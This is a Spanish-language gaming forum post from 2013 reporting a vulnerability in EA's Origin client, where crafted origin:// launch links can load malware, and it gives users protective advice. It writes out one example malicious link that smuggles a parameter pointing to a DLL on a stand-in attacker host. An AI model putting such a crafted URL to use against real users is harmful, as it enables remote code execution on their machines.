LagZero.NET - Foros: Descubierto un fallo de seguridad en Origin [Hax0r] - LagZero.NET - Foros

Ir a contenido

Página 1 de 1
  • No puedes empezar un nuevo tema
  • No puedes responder a este tema

Descubierto un fallo de seguridad en Origin [Hax0r] Poner ratio al tema: -----

#1 Usuario Desconectado   Bot

  • Homicida en Potencia
  • Icono
  • Grupo: Equipo LagZero.NET
  • Mensajes: 9309
  • Registrado: 27-July 08

Publicado el 19 de March de 2013 - 07:30:15 Horas

origin-2

Se ha encontrado una falla de seguridad en Origin que permitiría que alguien remotamente mandara Malware a tu equipo, según reporta Ars Technica este fallo de seguridad estaría asociado con la ejecución de juegos vía navegador web.

Esto se debe a que los clientes en si a veces funcionan como un navegador web para mantenernos conectados a futuras actualizaciones, sin embargo el riesgo es más alto si ejecutamos un juego vía navegador web, ya que generalmente la aplicación nos pide asociar el vinculo con el programa que va a correr dicha aplicación.

Al vincular la aplicación el juego se ejecutaría de la siguiente forma “origin://LaunchGame/[GameID]“, así que solo le bastaría al atacante modificar el link en algo como esto “origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll” ten en cuenta que no todos los navegadores muestran la ruta completa o bien algunos colocan la opción de “no volver a preguntar” lo que hace fácil el meter este tipo de código sin que algunos se den cuenta.

En Steam este mismo error ya había sido detectado antes, durante Octubre, lo que no se sabe es si se encontró alguna solución. La recomendación en este caso es siempre tratar de utilizar solo el cliente (o el acceso directo) para correr el juego, en casos como el Battlelog tratar de fijarse que el link no tenga nada raro y por ultimo desactivar la opción de que las URL Origin:// o Steam:// ejecuten la aplicación de forma automática.

A continuación pueden ver un ejemplo de cómo funciona la vulnerabilidad.

Click Para Ver el Video

En este PDF se detalla lo que se acaba de ver en el vídeo.



Comentar este Artículo

Página 1 de 1
  • No puedes empezar un nuevo tema
  • No puedes responder a este tema

1 usuarios están leyendo este tema
0 miembros, 1 invitados, 0 usuarios anónimos